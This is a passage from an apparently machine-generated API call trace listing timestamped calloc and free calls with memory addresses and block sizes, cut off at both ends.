0x1fa0398 [0065.082] free (_Block=0x1fa0398) [0065.082] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.082] free (_Block=0x1fa0398) [0065.082] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.082] free (_Block=0x1fa0398) [0065.082] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.082] free (_Block=0x1fa0398) [0065.082] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.082] free (_Block=0x1fa0398) [0065.082] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.082] free (_Block=0x1fa0398) [0065.082] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.082] free (_Block=0x1fa0398) [0065.082] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.082] free (_Block=0x1fa0398) [0065.082] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.082] free (_Block=0x1fa0398) [0065.082] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.082] free (_Block=0x1fa0398) [0065.082] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.082] free (_Block=0x1fa0398) [0065.082] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.083] free (_Block=0x1fa0398) [0065.083] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.084] free (_Block=0x1fa0398) [0065.084] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.084] free (_Block=0x1fa0398) [0065.084] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.084] free (_Block=0x1fa0398) [0065.084] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.084] free (_Block=0x1fa0398) [0065.084] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.084] free (_Block=0x1fa0398) [0065.084] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.084] free (_Block=0x1fa0398) [0065.084] free (_Block=0x1fa0158) [0065.084] free (_Block=0x1fa0888) [0065.084] free (_Block=0x1fa0770) [0065.084] free (_Block=0x1fa0998) [0065.084] free (_Block=0x77ffb0) [0065.084] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1d80 [0065.084] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1cf0 [0065.084] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1c60 [0065.084] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1bd0 [0065.084] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1b40 [0065.084] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1ab0 [0065.084] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1a20 [0065.084] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1990 [0065.084] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1900 [0065.084] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1870 [0065.084] calloc (_Count=0x21, _Size=0x4) returned 0x1fa17e0 [0065.084] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1750 [0065.084] calloc (_Count=0x21, _Size=0x4) returned 0x1fa16c0 [0065.084] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1630 [0065.084] calloc (_Count=0x21, _Size=0x4) returned 0x1fa15a0 [0065.084] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1510 [0065.085] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1480 [0065.085] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0af0 [0065.085] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0b80 [0065.085] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0c10 [0065.085] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0ca0 [0065.085] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0d30 [0065.085] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0dc0 [0065.085] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0e50 [0065.085] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0ee0 [0065.085] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0f70 [0065.085] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1000 [0065.085] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1090 [0065.085] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1120 [0065.085] calloc (_Count=0x21, _Size=0x4) returned 0x1fa11b0 [0065.085] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1240 [0065.085] calloc (_Count=0x21, _Size=0x4) returned 0x1fa12d0 [0065.090] free (_Block=0x1fa1d80) [0065.090] free (_Block=0x1fa1cf0) [0065.090] free (_Block=0x1fa1c60) [0065.090] free (_Block=0x1fa1bd0) [0065.090] free (_Block=0x1fa1b40) [0065.090] free (_Block=0x1fa1ab0) [0065.090] free (_Block=0x1fa1a20) [0065.090] free (_Block=0x1fa1990) [0065.090] free (_Block=0x1fa1900) [0065.090] free (_Block=0x1fa1870) [0065.090] free (_Block=0x1fa17e0) [0065.090] free (_Block=0x1fa1750) [0065.090] free (_Block=0x1fa16c0) [0065.090] free (_Block=0x1fa1630) [0065.090] free (_Block=0x1fa15a0) [0065.090] free (_Block=0x1fa1510) [0065.090] free (_Block=0x1fa1480) [0065.090] free (_Block=0x1fa0af0) [0065.091] free (_Block=0x1fa0b80) [0065.091] free (_Block=0x1fa0c10) [0065.091] free (_Block=0x1fa0ca0) [0065.091] free (_Block=0x1fa0d30) [0065.091] free (_Block=0x1fa0dc0) [0065.091] free (_Block=0x1fa0e50) [0065.091] free (_Block=0x1fa0ee0) [0065.091] free (_Block=0x1fa0f70) [0065.091] free (_Block=0x1fa1000) [0065.091] free (_Block=0x1fa1090) [0065.091] free (_Block=0x1fa1120) [0065.091] free (_Block=0x1fa11b0) [0065.091] free (_Block=0x1fa1240) [0065.091] free (_Block=0x1fa12d0) [0065.091] free (_Block=0x1fa1360) [0065.091] free (_Block=0x77fea0) [0065.091] free (_Block=0x77db40) [0065.091] free (_Block=0x77dbc8) [0065.091] free (_Block=0x1fa13f0) [0065.091] free (_Block=0x1fa0048) [0065.091] calloc (_Count=0x20, _Size=0x4) returned 0x77dbc8 [0065.091] calloc (_Count=0x20, _Size=0x4) returned 0x77db40 [0065.092] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0065.092] calloc (_Count=0x21, _Size=0x4) returned 0x1fa13f0 [0065.092] free (_Block=0x77dc50) [0065.092] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1360 [0065.092] calloc (_Count=0x42, _Size=0x4) returned 0x77fea0 [0065.092] calloc (_Count=0x1, _Size=0x4) returned 0x1fa0398 [0065.092] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0048 [0065.092] free (_Block=0x1fa0398) [0065.092] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0158 [0065.092] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0065.092] calloc (_Count=0x43, _Size=0x4) returned 0x1fa0770 [0065.092] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.092] calloc (_Count=0x3, _Size=0x4) returned 0x77ffb0 [0065.092] calloc (_Count=0x21, _Size=0x4) returned 0x1fa12d0 [0065.092] free (_Block=0x77dc50) [0065.092] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0888 [0065.092] free (_Block=0x1fa12d0) [0065.092] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.092] calloc (_Count=0x3, _Size=0x4) returned 0x77ffc8 [0065.092] free (_Block=0x1fa0398) [0065.092] free (_Block=0x1fa0388) [0065.092] calloc (_Count=0x22, _Size=0x4) returned 0x1fa12d0 [0065.092] free (_Block=0x77ffc8) [0065.092] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0998 [0065.092] free (_Block=0x1fa12d0) [0065.092] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.092] free (_Block=0x1fa0388) [0065.092] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.093] free (_Block=0x1fa0388) [0065.093] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.093] free (_Block=0x1fa0388) [0065.093] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.093] free (_Block=0x1fa0388) [0065.093] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.093] free (_Block=0x1fa0388) [0065.093] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.093] free (_Block=0x1fa0388) [0065.093] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.093] free (_Block=0x1fa0388) [0065.093] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.093] free (_Block=0x1fa0388) [0065.093] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.093] free (_Block=0x1fa0388) [0065.093] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.093] free (_Block=0x1fa0388) [0065.093] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.093] free (_Block=0x1fa0388) [0065.093] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.093] free (_Block=0x1fa0388) [0065.093] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.093] free (_Block=0x1fa0388) [0065.093] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.093] free (_Block=0x1fa0388) [0065.093] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.093] free (_Block=0x1fa0388) [0065.094] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.094] free (_Block=0x1fa0388) [0065.094] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.094] free (_Block=0x1fa0388) [0065.094] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.094] free (_Block=0x1fa0388) [0065.094] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.094] free (_Block=0x1fa0388) [0065.094] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.094] free (_Block=0x1fa0388) [0065.094] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.094] free (_Block=0x1fa0388) [0065.094] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.094] free (_Block=0x1fa0388) [0065.094] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.094] free (_Block=0x1fa0388) [0065.094] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.094] free (_Block=0x1fa0388) [0065.094] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.094] free (_Block=0x1fa0388) [0065.094] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.094] free (_Block=0x1fa0388) [0065.094] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.094] free (_Block=0x1fa0388) [0065.094] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.094] free (_Block=0x1fa0388) [0065.094] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.095] free (_Block=0x1fa0388) [0065.095] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.095] free (_Block=0x1fa0388) [0065.095] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.095] free (_Block=0x1fa0388) [0065.095] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.095] free (_Block=0x1fa0388) [0065.095] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.095] free (_Block=0x1fa0388) [0065.095] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.095] free (_Block=0x1fa0388) [0065.095] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.095] free (_Block=0x1fa0388) [0065.095] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.095] free (_Block=0x1fa0388) [0065.095] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.095] free (_Block=0x1fa0388) [0065.095] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.095] free (_Block=0x1fa0388) [0065.095] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.095] free (_Block=0x1fa0388) [0065.095] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.095] free (_Block=0x1fa0388) [0065.095] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.095] free (_Block=0x1fa0388) [0065.095] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.096] free (_Block=0x1fa0388) [0065.096] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.096] free (_Block=0x1fa0388) [0065.096] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.096] free (_Block=0x1fa0388) [0065.096] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.096] free (_Block=0x1fa0388) [0065.096] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.096] free (_Block=0x1fa0388) [0065.096] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.096] free (_Block=0x1fa0388) [0065.096] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.096] free (_Block=0x1fa0388) [0065.096] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.096] free (_Block=0x1fa0388) [0065.096] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.096] free (_Block=0x1fa0388) [0065.096] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.096] free (_Block=0x1fa0388) [0065.096] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.096] free (_Block=0x1fa0388) [0065.096] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.096] free (_Block=0x1fa0388) [0065.096] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.096] free (_Block=0x1fa0388) [0065.096] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.097] free (_Block=0x1fa0388) [0065.097] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.097] free (_Block=0x1fa0388) [0065.097] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.097] free (_Block=0x1fa0388) [0065.097] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.097] free (_Block=0x1fa0388) [0065.097] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.097] free (_Block=0x1fa0388) [0065.097] free (_Block=0x1fa0158) [0065.097] free (_Block=0x1fa0888) [0065.097] free (_Block=0x1fa0770) [0065.097] free (_Block=0x1fa0998) [0065.097] free (_Block=0x77ffb0) [0065.097] calloc (_Count=0x21, _Size=0x4) returned 0x1fa12d0 [0065.097] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1240 [0065.097] calloc (_Count=0x21, _Size=0x4) returned 0x1fa11b0 [0065.097] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1120 [0065.097] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1090 [0065.097] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1000 [0065.097] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0f70 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0ee0 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0e50 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0dc0 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0d30 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0ca0 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0c10 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0b80 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0af0 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1480 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1510 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa15a0 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1630 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa16c0 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1750 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa17e0 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1870 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1900 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1990 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1a20 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1ab0 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1b40 [0065.098] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1bd0 [0065.099] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1c60 [0065.099] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1cf0 [0065.099] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1d80 [0065.104] free (_Block=0x1fa12d0) [0065.104] free (_Block=0x1fa1240) [0065.104] free (_Block=0x1fa11b0) [0065.104] free (_Block=0x1fa1120) [0065.104] free (_Block=0x1fa1090) [0065.104] free (_Block=0x1fa1000) [0065.104] free (_Block=0x1fa0f70) [0065.104] free (_Block=0x1fa0ee0) [0065.104] free (_Block=0x1fa0e50) [0065.104] free (_Block=0x1fa0dc0) [0065.104] free (_Block=0x1fa0d30) [0065.104] free (_Block=0x1fa0ca0) [0065.104] free (_Block=0x1fa0c10) [0065.104] free (_Block=0x1fa0b80) [0065.104] free (_Block=0x1fa0af0) [0065.104] free (_Block=0x1fa1480) [0065.104] free (_Block=0x1fa1510) [0065.104] free (_Block=0x1fa15a0) [0065.104] free (_Block=0x1fa1630) [0065.104] free (_Block=0x1fa16c0) [0065.104] free (_Block=0x1fa1750) [0065.104] free (_Block=0x1fa17e0) [0065.104] free (_Block=0x1fa1870) [0065.104] free (_Block=0x1fa1900) [0065.104] free (_Block=0x1fa1990) [0065.104] free (_Block=0x1fa1a20) [0065.104] free (_Block=0x1fa1ab0) [0065.104] free (_Block=0x1fa1b40) [0065.104] free (_Block=0x1fa1bd0) [0065.105] calloc (_Count=0x20, _Size=0x4) returned 0x77db40 [0065.105] calloc (_Count=0x20, _Size=0x4) returned 0x77dbc8 [0065.105] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0065.105] calloc (_Count=0x21, _Size=0x4) returned 0x1fa13f0 [0065.105] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1360 [0065.105] calloc (_Count=0x42, _Size=0x4) returned 0x77fea0 [0065.105] calloc (_Count=0x1, _Size=0x4) returned 0x1fa0388 [0065.105] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0048 [0065.105] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0158 [0065.105] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0065.105] calloc (_Count=0x43, _Size=0x4) returned 0x1fa0770 [0065.105] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.105] calloc (_Count=0x3, _Size=0x4) returned 0x1fa2af0 [0065.105] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1d80 [0065.105] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0888 [0065.105] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.105] calloc (_Count=0x3, _Size=0x4) returned 0x1fa2b08 [0065.105] calloc (_Count=0x22, _Size=0x4) returned 0x1fa1d80 [0065.106] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0998 [0065.106] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.106] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.106] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.106] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.106] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.106] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.106] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.106] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.106] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.106] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.448] free (_Block=0x1fa12d0) [0065.448] free (_Block=0x1fa1240) [0065.448] free (_Block=0x1fa11b0) [0065.448] free (_Block=0x1fa1120) [0065.448] free (_Block=0x1fa1090) [0065.448] free (_Block=0x1fa1000) [0065.448] free (_Block=0x1fa0f70) [0065.448] free (_Block=0x1fa0ee0) [0065.448] free (_Block=0x1fa0e50) [0065.448] free (_Block=0x1fa0dc0) [0065.449] free (_Block=0x1fa0d30) [0065.449] free (_Block=0x1fa0ca0) [0065.449] free (_Block=0x1fa0c10) [0065.449] free (_Block=0x1fa0b80) [0065.449] free (_Block=0x1fa0af0) [0065.449] free (_Block=0x1fa1480) [0065.449] free (_Block=0x1fa1510) [0065.449] free (_Block=0x1fa15a0) [0065.449] free (_Block=0x1fa1630) [0065.449] free (_Block=0x1fa16c0) [0065.449] free (_Block=0x1fa1750) [0065.449] free (_Block=0x1fa17e0) [0065.449] free (_Block=0x1fa1870) [0065.449] free (_Block=0x1fa1900) [0065.449] free (_Block=0x1fa1990) [0065.449] free (_Block=0x1fa1a20) [0065.449] free (_Block=0x1fa1ab0) [0065.449] free (_Block=0x1fa1b40) [0065.449] free (_Block=0x1fa1bd0) [0065.449] free (_Block=0x1fa1c60) [0065.449] free (_Block=0x1fa1cf0) [0065.449] free (_Block=0x1fa1d80) [0065.449] free (_Block=0x1fa1360) [0065.449] free (_Block=0x77fea0) [0065.449] free (_Block=0x77dbc8) [0065.449] free (_Block=0x77db40) [0065.449] free (_Block=0x1fa13f0) [0065.449] free (_Block=0x1fa0048) [0065.464] free (_Block=0x1fa12d0) [0065.464] free (_Block=0x1fa1240) [0065.464] free (_Block=0x1fa11b0) [0065.464] free (_Block=0x1fa1120) [0065.464] free (_Block=0x1fa1090) [0065.464] free (_Block=0x1fa1000) [0065.464] free (_Block=0x1fa0f70) [0065.464] free (_Block=0x1fa0ee0) [0065.464] free (_Block=0x1fa0e50) [0065.464] free (_Block=0x1fa0dc0) [0065.464] free (_Block=0x1fa0d30) [0065.464] free (_Block=0x1fa0ca0) [0065.465] free (_Block=0x1fa0c10) [0065.465] free (_Block=0x1fa0b80) [0065.465] free (_Block=0x1fa0af0) [0065.465] free (_Block=0x1fa1480) [0065.465] free (_Block=0x1fa1510) [0065.465] free (_Block=0x1fa15a0) [0065.465] free (_Block=0x1fa1630) [0065.465] free (_Block=0x1fa16c0) [0065.465] free (_Block=0x1fa1750) [0065.465] free (_Block=0x1fa17e0) [0065.465] free (_Block=0x1fa1870) [0065.465] free (_Block=0x1fa1900) [0065.465] free (_Block=0x1fa1990) [0065.465] free (_Block=0x1fa1a20) [0065.465] free (_Block=0x1fa1ab0) [0065.465] free (_Block=0x1fa1b40) [0065.465] free (_Block=0x1fa1bd0) [0065.465] free (_Block=0x1fa1c60) [0065.465] free (_Block=0x1fa1cf0) [0065.465] free (_Block=0x1fa1d80) [0065.465] free (_Block=0x1fa1360) [0065.465] free (_Block=0x77fea0) [0065.483] free (_Block=0x1fa1d80) [0065.483] free (_Block=0x1fa1cf0) [0065.483] free (_Block=0x1fa1c60) [0065.483] free (_Block=0x1fa1bd0) [0065.483] free (_Block=0x1fa1b40) [0065.483] free (_Block=0x1fa1ab0) [0065.483] free (_Block=0x1fa1a20) [0065.483] free (_Block=0x1fa1990) [0065.483] free (_Block=0x1fa1900) [0065.483] free (_Block=0x1fa1870) [0065.483] free (_Block=0x1fa17e0) [0065.483] free (_Block=0x1fa1750) [0065.483] free (_Block=0x1fa16c0) [0065.483] free (_Block=0x1fa1630) [0065.483] free (_Block=0x1fa15a0) [0065.483] free (_Block=0x1fa1510) [0065.483] free (_Block=0x1fa1480) [0065.483] free (_Block=0x1fa0af0) [0065.483] free (_Block=0x1fa0b80) [0065.483] free (_Block=0x1fa0c10) [0065.483] free (_Block=0x1fa0ca0) [0065.484] free (_Block=0x1fa0d30) [0065.484] free (_Block=0x1fa0dc0) [0065.484] free (_Block=0x1fa0e50) [0065.484] free (_Block=0x1fa0ee0) [0065.484] free (_Block=0x1fa0f70) [0065.484] free (_Block=0x1fa1000) [0065.484] free (_Block=0x1fa1090) [0065.484] free (_Block=0x1fa1120) [0065.484] free (_Block=0x1fa11b0) [0065.484] free (_Block=0x1fa1240) [0065.484] free (_Block=0x1fa12d0) [0065.484] free (_Block=0x1fa1360) [0065.484] free (_Block=0x77fea0) [0065.484] free (_Block=0x77db40) [0065.484] free (_Block=0x77dbc8) [0065.484] free (_Block=0x1fa13f0) [0065.484] free (_Block=0x1fa0048) [0065.485] calloc (_Count=0x20, _Size=0x4) returned 0x77dbc8 [0065.485] calloc (_Count=0x20, _Size=0x4) returned 0x77db40 [0065.485] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0065.485] calloc (_Count=0x21, _Size=0x4) returned 0x1fa13f0 [0065.485] free (_Block=0x77dc50) [0065.485] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1360 [0065.485] calloc (_Count=0x42, _Size=0x4) returned 0x77fea0 [0065.485] calloc (_Count=0x1, _Size=0x4) returned 0x1fa0388 [0065.485] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0048 [0065.485] free (_Block=0x1fa0388) [0065.485] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0158 [0065.485] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0065.485] calloc (_Count=0x43, _Size=0x4) returned 0x1fa0770 [0065.485] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.485] calloc (_Count=0x3, _Size=0x4) returned 0x1fa2af0 [0065.485] calloc (_Count=0x21, _Size=0x4) returned 0x1fa12d0 [0065.485] free (_Block=0x77dc50) [0065.485] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0888 [0065.485] free (_Block=0x1fa12d0) [0065.485] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.485] calloc (_Count=0x3, _Size=0x4) returned 0x1fa2b08 [0065.485] free (_Block=0x1fa0388) [0065.485] free (_Block=0x1fa0398) [0065.486] calloc (_Count=0x22, _Size=0x4) returned 0x1fa12d0 [0065.486] free (_Block=0x1fa2b08) [0065.486] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0998 [0065.486] free (_Block=0x1fa12d0) [0065.486] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.486] free (_Block=0x1fa0398) [0065.486] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.486] free (_Block=0x1fa0398) [0065.486] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.486] free (_Block=0x1fa0398) [0065.486] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.486] free (_Block=0x1fa0398) [0065.486] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.486] free (_Block=0x1fa0398) [0065.486] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.486] free (_Block=0x1fa0398) [0065.486] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.486] free (_Block=0x1fa0398) [0065.486] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.486] free (_Block=0x1fa0398) [0065.486] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.486] free (_Block=0x1fa0398) [0065.486] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.487] free (_Block=0x1fa0398) [0065.487] calloc 